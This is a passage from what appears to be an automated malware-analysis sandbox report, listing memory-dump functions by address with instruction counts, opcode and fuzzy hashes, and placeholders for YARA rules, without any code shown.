              • Instruction ID: 9fd20ac913ca44b09d454e15cf94e26a9a8cc138cfb444f8e1f0763f14b6a1f9
              • Opcode Fuzzy Hash: 4b21ee40ca478c307bf6e3b6ac7424193d1f62a79c75cbae6fca067ffe7645d7
              • Instruction Fuzzy Hash: AB415935A01205DFDB18CB68C468BAD7BA3FF89720F248469D402AB7A4DB75AC42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AEB30, Relevance: .1, Instructions: 103COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 395a4f41bc4c1f945c26c3fb7a9375570a189caba3432420c724853d286b2ab4
              • Instruction ID: 7c1de420cfad705f27beb5782c2cfde0f67523f50682750ed2fdcbb546978ce9
              • Opcode Fuzzy Hash: 395a4f41bc4c1f945c26c3fb7a9375570a189caba3432420c724853d286b2ab4
              • Instruction Fuzzy Hash: 3731B436A001159FDF11EFA8D8488AE7BB7BF89310B054465E913AB250DB72AC19CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0006, Relevance: .1, Instructions: 100COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 23b52a49bc4030fa453404139243eefacd63e8ece311eb19cfd34841e9d32519
              • Instruction ID: d4781eddad46c24eb78929b73121a4440c70d52f33f0db9f529a8f39af81eafc
              • Opcode Fuzzy Hash: 23b52a49bc4030fa453404139243eefacd63e8ece311eb19cfd34841e9d32519
              • Instruction Fuzzy Hash: 7331F471A093C0AFE742CBB98C00696BFF5AF4A200F0A41EFD145DB263D2359806C762
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADFF1, Relevance: .1, Instructions: 99COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc91bf052fcbd49e6749f06d1f2f7e5b5865b1ee0a8f4a9fa56578db8ced6024
              • Instruction ID: f5b10ce5a05a4ba1726f23397d4e98fe6a34e7543c0e2d116a4cdc09025f6566
              • Opcode Fuzzy Hash: fc91bf052fcbd49e6749f06d1f2f7e5b5865b1ee0a8f4a9fa56578db8ced6024
              • Instruction Fuzzy Hash: 7E319332A00219DFCF54DF94C9459EDBBBBBF98300F004469EA06AB261DB329D56CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A43C0, Relevance: .1, Instructions: 99COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a3829388c05080ad914ad6c3414bf3656408721028c800cbad3893c22cb8613
              • Instruction ID: 4926e2baf069553828adea632feb70e165f0bfbe5f2f57f662b45123a47ff714
              • Opcode Fuzzy Hash: 7a3829388c05080ad914ad6c3414bf3656408721028c800cbad3893c22cb8613
              • Instruction Fuzzy Hash: 7231D036900241CFDB50DF68E8488AD7BF3FF84315B1481AAE4069B239DB39AC26CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A1290, Relevance: .1, Instructions: 99COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e3b2f2f291fa861519e6970976017316434325a3b39fc8e1783a538c0477c3e3
              • Instruction ID: 6b6c67e75d34aae7c6331fa6b2bf51bbaae3a21454f443366e9291366a06125f
              • Opcode Fuzzy Hash: e3b2f2f291fa861519e6970976017316434325a3b39fc8e1783a538c0477c3e3
              • Instruction Fuzzy Hash: 3241F774E04259DFDB64DF65D884B9DBBB2BF4A240F0040AAD40EAB754DB309D85CF61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A20D0, Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f07c69485550e16487d64b0561498d574cd699affa7bd1180dec091e312c5954
              • Instruction ID: 639c5a8ed0499921026f1d43b84617c5478dbd7ac1b1a396470b8f496ae01e2a
              • Opcode Fuzzy Hash: f07c69485550e16487d64b0561498d574cd699affa7bd1180dec091e312c5954
              • Instruction Fuzzy Hash: 14319435A48245DFDB05DF68C8A0A7EBBB2FF85300F11806AD6069B254DB309C52CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AEB21, Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c1b1b835068cc6f56af0d5e0df081f4eff8601f6d72557e01a19ae7807771f72
              • Instruction ID: e02d62a2f00550225f77d3bb987764ae1477a2aed270e1d2ba9a91500e1a10fa
              • Opcode Fuzzy Hash: c1b1b835068cc6f56af0d5e0df081f4eff8601f6d72557e01a19ae7807771f72
              • Instruction Fuzzy Hash: 2931C9369001159FDF01EF68D8489AEBBF7BF89310F054855E513AB150DB72AD05CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADED9, Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a413f5956e58f5b043d83c7cf911f3b2bb50b861b69c2086c6473ff103ddb1e
              • Instruction ID: ef7b3094bbeacd36335ac08a2687eb67790ab48163fc05e20821e9b842434cdc
              • Opcode Fuzzy Hash: 6a413f5956e58f5b043d83c7cf911f3b2bb50b861b69c2086c6473ff103ddb1e
              • Instruction Fuzzy Hash: 14312C76A04205DFCB94DF68C584AAEBBF2BB88214F149169D80AE7B41DB31DC42CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0101, Relevance: .1, Instructions: 98COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0bd0eb197de834d8f129fffa2f77e448fec2e00ce0d3d1391a0e34a162aef22a
              • Instruction ID: daf1ffe92a6407c6b368672a1bcc5e43459ad64ca3681cdc3e976c2b4e867d53
              • Opcode Fuzzy Hash: 0bd0eb197de834d8f129fffa2f77e448fec2e00ce0d3d1391a0e34a162aef22a
              • Instruction Fuzzy Hash: A2310C70F04209DFDB94CF69C480AADBBF1BF48304F208569DA1AEB251DA71E9858F91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A45C8, Relevance: .1, Instructions: 95COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 758dd24da6d580272309273f6c1ffd947008adffeb7f1e4cc7a31375e3e91da0
              • Instruction ID: 27ff6fda74349f425e5f2da35ecba9ea1d0afd88c11ec829eb38ceced8394a4a
              • Opcode Fuzzy Hash: 758dd24da6d580272309273f6c1ffd947008adffeb7f1e4cc7a31375e3e91da0
              • Instruction Fuzzy Hash: 1E218136F0411A9FDF44DAA9DC81AFEB3BAFBC8241F10413AD619D3240EAB05D56CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6F00, Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 215b67132f75c502221eb4dcd10fc8833cc6af00743c83c6982a4e7b6c072805
              • Instruction ID: bc691150f6908c238fd8ed70c96ca99288827afc9531c16460c3310d3503e414
              • Opcode Fuzzy Hash: 215b67132f75c502221eb4dcd10fc8833cc6af00743c83c6982a4e7b6c072805
              • Instruction Fuzzy Hash: A2312D32E002598FDB14DBB9C4545AEB7F3EF88310B14856AD80AAB355DA31AC46CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0908, Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2dc048a084c3afdfde92804d5275e08148fafa9a226c28fed25f2a72ff800511
              • Instruction ID: 1e1926dc9316ece218ef5822fc5f04133578102b2a16ad0a2af43a11b0367447
              • Opcode Fuzzy Hash: 2dc048a084c3afdfde92804d5275e08148fafa9a226c28fed25f2a72ff800511
              • Instruction Fuzzy Hash: F4415B30A04B40CFE3B9CF2AC55436AB7F2BF84305F44C86EC29A87A91CB75A441CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A50E0, Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c5fd01869eaed343a9544e3f4936cf2b9dcbe33833caaa79f6bd30de659e16e9
              • Instruction ID: e3bcec26592ab7e47724bcae375fadcb08ba13d4baadc68d7020691c5188a004
              • Opcode Fuzzy Hash: c5fd01869eaed343a9544e3f4936cf2b9dcbe33833caaa79f6bd30de659e16e9
              • Instruction Fuzzy Hash: 35214876A003099FDF04EFA9C4146AEBBF6AF99300F514529D40AAB355EB70AD46CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE448, Relevance: .1, Instructions: 90COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b34c3559b54d7b96d0223e56ec74b7ed47db2c89169fbd6ea680e311c86c2f2
              • Instruction ID: 7b298b2ba12f9599a6dd4119200c5d01dced95dce001484dc03f82493151f0ac
              • Opcode Fuzzy Hash: 3b34c3559b54d7b96d0223e56ec74b7ed47db2c89169fbd6ea680e311c86c2f2
              • Instruction Fuzzy Hash: A2315C31B00605CFCB54DFA9D585AAEBBF6BF88604B50452DE506A7750EB32EC42CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5738, Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5b8bebaf17a6775525f07c4f501738728cbc47a84412f58b8772d930758053b0
              • Instruction ID: 97b96b51b5367df4e5a53ec2008bafb17caa9021327a4a0c97f885bb3b3e8fba
              • Opcode Fuzzy Hash: 5b8bebaf17a6775525f07c4f501738728cbc47a84412f58b8772d930758053b0
              • Instruction Fuzzy Hash: 3F219A36B012158BCF58DAB994906FEB6E7AFA8221B50843EC407E7350DE358C02CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A54F9, Relevance: .1, Instructions: 88COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 60bd536dad631d25bef85c8b42704d29f98f05e3b066ff529ad5a9e97377f28e
              • Instruction ID: 171d6f0bb75e16041b0aa6ded47d61b6cf1f607beeb6e123cb988f1b3e85b279
              • Opcode Fuzzy Hash: 60bd536dad631d25bef85c8b42704d29f98f05e3b066ff529ad5a9e97377f28e
              • Instruction Fuzzy Hash: 0A21AB36B042019FCF54E7B5941866E7BE3AF94651B2488BAD407CB7A4EE398C42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADCF1, Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 66fe9e339f5d2d893ebbe3e3797e20f9e20a0e95b3662b7c8b51a8397728fcd8
              • Instruction ID: 885bbb5b95eb7716d6903f04b96eed829d65bb25f49160d8d607b4ed70cb8522
              • Opcode Fuzzy Hash: 66fe9e339f5d2d893ebbe3e3797e20f9e20a0e95b3662b7c8b51a8397728fcd8
              • Instruction Fuzzy Hash: 1E3129302057018BC7A8AB39C5A066A7BE3BFD47447648D2DD2868F758DF72EC038B80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A84D1, Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 20c3102c06951d240370839a8f0f9bb0dd10be6de2d31986c1a174d9938dcb98
              • Instruction ID: b7772ccc54827c144ca15642d0f1715eae27b909e786dab20d85221a3605d418
              • Opcode Fuzzy Hash: 20c3102c06951d240370839a8f0f9bb0dd10be6de2d31986c1a174d9938dcb98
              • Instruction Fuzzy Hash: 8031AE71D09345CFCB85CBA4C4646ADBFF1FF46310F10849AD8029B2A1EA748E42CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A43D0, Relevance: .1, Instructions: 87COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2e40032e753a16fa1d92ad9d044e3d8355f29e9d064de44320bcfaea4c64d54
              • Instruction ID: 72c1e128381522f5c7d9ffdce11779824b2e82246a406ea0cea1289c72e1069b
              • Opcode Fuzzy Hash: f2e40032e753a16fa1d92ad9d044e3d8355f29e9d064de44320bcfaea4c64d54
              • Instruction Fuzzy Hash: BC319F36900155CFDB50EF68E84889D7BB3FF84305B148169E4065B279DF35AC26DF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0BCD, Relevance: .1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction ID: 42b1dc7a338a81e3441dae0e9effc605c58d59a6767e09874405063499e893d4
              • Opcode Fuzzy Hash: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction Fuzzy Hash: 6B31DF35B002459FDB54DFB9C0546AEBBE2BB88304F54816DD10AAB394DB34AD46CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0BD9, Relevance: .1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction ID: 42b1dc7a338a81e3441dae0e9effc605c58d59a6767e09874405063499e893d4
              • Opcode Fuzzy Hash: 24a798115c499b8a301cb6f5af82704b9aa756ee7ff1e24ed859b221c4cf473c
              • Instruction Fuzzy Hash: 6B31DF35B002459FDB54DFB9C0546AEBBE2BB88304F54816DD10AAB394DB34AD46CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0020, Relevance: .1, Instructions: 85COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c90ab59d3924f2d3efe5b4aa62a3328aaa51b8be25d3deaab21d470dc800984
              • Instruction ID: 234c8ff97ed4ab196a8cd37b6d8dfeb7aff0d88f4e284660dd1264f152d0797f
              • Opcode Fuzzy Hash: 7c90ab59d3924f2d3efe5b4aa62a3328aaa51b8be25d3deaab21d470dc800984
              • Instruction Fuzzy Hash: BE319170609382CFC745DBB0D4985597FE2FF41311B06896FE085CB2A6EB788C56CB52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A8348, Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f45f43ee15e9f6fa4033600a968b9de6f1745529e7034b3a0ddb03ae840cc98
              • Instruction ID: 1b4bc3a248c2263f7d85c4e19bd643741f1677487762cbbd4e39b61471a8e74e
              • Opcode Fuzzy Hash: 9f45f43ee15e9f6fa4033600a968b9de6f1745529e7034b3a0ddb03ae840cc98
              • Instruction Fuzzy Hash: 9A319E31B14201CFC798EB78E45856D3BE3EB8431271585AAE516CB2A4DF78AC42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AECE0, Relevance: .1, Instructions: 82COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f3e2168cda830d1c236d489c6518b9a66425056150b300d0b1099d5b2a759ad0
              • Instruction ID: f526dfc0c78b1b01c430d3ed5152af5f0aba4c68f3bb210eb063137f85a9cd30
              • Opcode Fuzzy Hash: f3e2168cda830d1c236d489c6518b9a66425056150b300d0b1099d5b2a759ad0
              • Instruction Fuzzy Hash: BC312975E002099FDB45DFB8C850AEEBBF6EF8C300F10842AE515AB265D736A911CF65
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA658, Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 36713f9c23a090b70dbd7b26953f796236182d565267590ad68d9782b37abd90
              • Instruction ID: 563cfbd4570ce8852463b293ff14a62545d64b906c3c15f44f2e206dcb80504e
              • Opcode Fuzzy Hash: 36713f9c23a090b70dbd7b26953f796236182d565267590ad68d9782b37abd90
              • Instruction Fuzzy Hash: 72217135B042559BCB15DFB5C9409AEB7B3FB98644F10493ED102AB654EB70AC42CFA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ADB87, Relevance: .1, Instructions: 80COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 098dbf400e7897fedf98a0b4fcfc05ba19be1f2806715c963ba352b9ee95cfc7
              • Instruction ID: 5edf909b3c0e95ac3cc1348ebd5cb414ea9d092b652a65dddd716d6e59575f0f
              • Opcode Fuzzy Hash: 098dbf400e7897fedf98a0b4fcfc05ba19be1f2806715c963ba352b9ee95cfc7
              • Instruction Fuzzy Hash: 3521D1B6A08214CBDB14DB6494007BAB7FABB88205F54446AE407EBB40DF759D43CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A68CE, Relevance: .1, Instructions: 79COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a6ec46ea79bd29d4b722f9df40af37d39a2da1341ec3c45aafba26a7a985bb4
              • Instruction ID: 15eb0ce3bc54f0909150cd0284c1f1ea5c796f1b2771e14e89e43756aacb2689
              • Opcode Fuzzy Hash: 9a6ec46ea79bd29d4b722f9df40af37d39a2da1341ec3c45aafba26a7a985bb4
              • Instruction Fuzzy Hash: D5316F746002018FC7A4AB39D4A855D3BA3FB853653548A6EF606CB394DF75AC06CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AD070, Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 341df382f8815c308a4c37131b386198c03ee0b015b1138bec728262d15ba37b
              • Instruction ID: e78fa4fbab92e09d87c7714b5674b871af3a1208580b415c05c88cdaa6b26002
              • Opcode Fuzzy Hash: 341df382f8815c308a4c37131b386198c03ee0b015b1138bec728262d15ba37b
              • Instruction Fuzzy Hash: 88313A706043518FC7899F2890685597FB2FB8931836488AEA909CF3A5DF76EC07CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AEA21, Relevance: .1, Instructions: 77COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a6ce35241419e88a99186040a969b1c373ed72fdb866e8d95d0c8ec76ef54ad1
              • Instruction ID: 605b4cf605dee9ca720d7bddb8c859b9b8c3f67bd563cb5c411718f6d0ed6a55
              • Opcode Fuzzy Hash: a6ce35241419e88a99186040a969b1c373ed72fdb866e8d95d0c8ec76ef54ad1
              • Instruction Fuzzy Hash: 8E215332A05205CFC765CB68C4447AAFBFABB84314F148579D54AD7359DB329C42CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7150, Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: edcad485a81a34f2d61e128c2459dac66b3af2f02649556cdcc588c2c558c972
              • Instruction ID: 2b97923fc504c756754278e22b40a883f99e26ca1a5213f842147a1dde43a7ca
              • Opcode Fuzzy Hash: edcad485a81a34f2d61e128c2459dac66b3af2f02649556cdcc588c2c558c972
              • Instruction Fuzzy Hash: 83210532B142009FDB18EBB694649BFBBE7EFD9200754413E90079B7A5ED719C01CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A21E9, Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fb15b5868d06bd0bfe39c1ff822ca45f30df2a3223c8b7cf6bc31e404632134b
              • Instruction ID: 8356f29c70c1732304867e17ca468a90b49eb8b0ffc00dbed7ae786c1a8b58d9
              • Opcode Fuzzy Hash: fb15b5868d06bd0bfe39c1ff822ca45f30df2a3223c8b7cf6bc31e404632134b
              • Instruction Fuzzy Hash: 61314875D4820ADFCBA4DFA4C0646BEBBB2FF45300F1081AAC402A7664E7359E42CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A25DE, Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 76d7a6d1a06755263f4d57f5ff3244f4bd9b756eaf6eea945bd2437683625b33
              • Instruction ID: c3ddc838e30c2643a61e94a7c4b9b15ede1f6e937a1694e176fa182a61f6dc1a
              • Opcode Fuzzy Hash: 76d7a6d1a06755263f4d57f5ff3244f4bd9b756eaf6eea945bd2437683625b33
              • Instruction Fuzzy Hash: 55316A75A00249CFDB60CF66D45469AFBB2FF84318F14D269C0059B268DBB49889CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A88E6, Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cd43eb222651353bbb849c769265aba095f036ce31dc6e8255c84527adcb0558
              • Instruction ID: 03106df47715004d5ac04c82976bfd37e135b3f6d6488bef8e3fdc828dedcb32
              • Opcode Fuzzy Hash: cd43eb222651353bbb849c769265aba095f036ce31dc6e8255c84527adcb0558
              • Instruction Fuzzy Hash: 8731CA31E00246CFEB64CF6AD448759BBB2BF84304F15D52AD415AB654DFB8A889CF82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A4F10, Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6edb9084d61e8931fa5cf945d37b6e02b0ceb028a8109743a6036b9cbb0f35ed
              • Instruction ID: 3314aceee5d9b30f19a94c55b3a0414259abddddd219fe2ad16c1f7815beb562
              • Opcode Fuzzy Hash: 6edb9084d61e8931fa5cf945d37b6e02b0ceb028a8109743a6036b9cbb0f35ed
              • Instruction Fuzzy Hash: 4F21D132608245CBCB04DA64EC949B97B63FBC0353B10956AE0068B748DFB8AC07CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A48B9, Relevance: .1, Instructions: 74COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 17dae551a61fac3fdb7c75d1df304dab6e9da337049b14aee61a2c8fd19bb8dc
              • Instruction ID: daecb83c3714f6c81aa3d55fec9dbb7a930707d5e156b0aa37210c6f1f1a9d99
              • Opcode Fuzzy Hash: 17dae551a61fac3fdb7c75d1df304dab6e9da337049b14aee61a2c8fd19bb8dc
              • Instruction Fuzzy Hash: C711AC32F0521A9BCF54DAA8DC508FEB3B7ABC5321B10406AD506B7250EE655D07CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A50D0, Relevance: .1, Instructions: 73COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 979aa4e7c3acffc3b42ee4522a3499df0dd94d2736f19bbaffedd9f79a2ab8fb
              • Instruction ID: 5191d4ee1fb12e963116c152bad571520afb2a38b6afdcce9e35b9462942d515
              • Opcode Fuzzy Hash: 979aa4e7c3acffc3b42ee4522a3499df0dd94d2736f19bbaffedd9f79a2ab8fb
              • Instruction Fuzzy Hash: FE213D72D003499FDF01DFA4D4545EEBBF2AF99310F214565C40AAB255E7745D8ACF80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA648, Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9eaa2472b9be9e804d9a65d8b88dde5517dea460bc717742566bad48652201d0
              • Instruction ID: bdf598ad700008a1f33dd43a0db7ac7a952b2141d37a23d9409d11c00074b158
              • Opcode Fuzzy Hash: 9eaa2472b9be9e804d9a65d8b88dde5517dea460bc717742566bad48652201d0
              • Instruction Fuzzy Hash: C3110236B042159BCB14DEA1C841AAEB3F3BB98650F10453FE002AB240EB709C81CFA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AAD60, Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cd5f209764ca4863a6c3e070d968c6bf773b50293b6680fed32c28b95236beba
              • Instruction ID: 651bb52135da266b1138a4e1beca72430a50df7eba303ffb9de72a28934b7847
              • Opcode Fuzzy Hash: cd5f209764ca4863a6c3e070d968c6bf773b50293b6680fed32c28b95236beba
              • Instruction Fuzzy Hash: 1421A1B6F042658FCB04DB99D8984ADFBB2FB89300B14856AE85AE3311D730AD11CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AF896, Relevance: .1, Instructions: 70COMMON
